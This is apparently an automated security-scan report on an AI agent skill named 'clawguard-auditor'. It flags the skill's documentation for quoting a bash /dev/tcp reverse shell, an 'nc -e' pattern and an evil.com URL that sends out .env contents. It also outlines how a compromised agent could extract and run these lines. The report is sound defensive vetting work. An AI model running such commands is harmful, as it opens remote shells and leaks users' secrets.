Suspicious — Risk Score 42/100
Last scan: 2 days ago
clawguard-auditor
Enterprise-grade Security Kernel, SAST Vetter, and Active DLP Engine for OpenClaw
Security auditor skill contains embedded reverse shell patterns (nc -e, bash -i >& /dev/tcp) and data exfiltration examples (evil.com/?data=$(cat .env)) within documentation. No executable code files present, but the skill specification describes extensive capabilities (filesystem:WRITE, network:READ, shell:ADMIN) without implementation.
Skill Name: clawguard-auditor
Duration: 74.2s
Engine: pi
Use with caution
Do not install this skill. The documentation contains dangerous pattern examples that could be extracted by a compromised AI agent, and the skill describes capabilities far exceeding what documentation-only implementation requires.

Attack Chain 4 steps

Entry: Skill masquerades as legitimate security auditor (SKILL.md:1)
Escalation: Documentation embeds reverse shell patterns as 'detection examples' (SKILL.md:55)
Escalation: AI agent extracts and interprets embedded patterns during skill processing (SKILL.md:55)
Impact: Potential execution of nc -e /dev/tcp or bash reverse shell commands (SKILL.md:55)

Findings 4 items

Severity Finding Location
High
Embedded reverse shell command patterns
SKILL.md contains literal strings 'nc -e' and 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1' at line 55 within a list of 'red flags to detect'. While in context these are examples, they represent dangerous patterns that could be extracted by prompt injection or interpreted by a compromised AI agent.
reverse shell signatures (`nc -e`, `bash -i >& /dev/tcp`)
→ Remove or escape dangerous patterns in documentation. Use generic descriptions like 'network connection backdoors' instead of literal command syntax.
SKILL.md:55
Medium
Data exfiltration pattern example
SKILL.md contains 'http://evil.com/?data=$(cat .env)' as an example of what the DLP engine should block. This embeds a real exfiltration technique as instructional content.
http://evil.com/?data=$(cat .env)
→ Replace with generic description: 'URL parameter data exfiltration attempts'.
SKILL.md:99
Medium
Capabilities exceed implementation
The skill describes requiring CAP_FS_WRITE, CAP_NET_EGRESS, CAP_SYS_EXEC, and CAP_FS_READ_SENSITIVE capabilities, but no executable code files exist. This creates a mismatch between declared purpose and actual functionality.
CAP_FS_WRITE: Modify workspace files
→ If this is documentation-only, declare NONE for all resource levels.
SKILL.md:25
Low
Documentation-only implementation
All files are Markdown or JSON with no scripts/, requirements.txt, package.json, or any executable code. The skill is a specification without implementation.
--- name: clawguard-auditor
→ Verify if actual implementation files exist or are expected.
SKILL.md:1
Resource | Declared | Inferred | Status | Evidence
Filesystem | WRITE | NONE | ✓ Aligned | SKILL.md describes CAP_FS_WRITE capability but no code exists to exercise it
Network | READ | NONE | ✓ Aligned | SKILL.md describes NET_EGRESS token but no network code present
Shell | ADMIN | NONE | ✓ Aligned | No shell scripts or subprocess calls in any file
Environment | READ | NONE | ✓ Aligned | Mentions credential access but no code implements it
2 Critical 3 findings
Critical: Dangerous Command (dangerous shell command)
nc -e
SKILL.md:55
Critical: Dangerous Command (dangerous shell command)
bash -i >&
SKILL.md:55
Medium: External URL
http://evil.com/?data=$(cat
SKILL.md:99

File Tree

3 files · 13.8 KB · 271 lines
Markdown 2f · 263L JSON 1f · 8L
├─ 📋 _meta.json JSON 8L · 286 B
├─ 📝 README.md Markdown 114L · 6.0 KB
└─ 📝 SKILL.md Markdown 149L · 7.6 KB

Security Positives

✓ No executable scripts or binary files present
✓ No actual network connections or data exfiltration attempted
✓ No credential harvesting code implemented
✓ No base64-encoded payloads or obfuscated code
✓ Patterns appear in documented 'detection examples' context rather than as instructions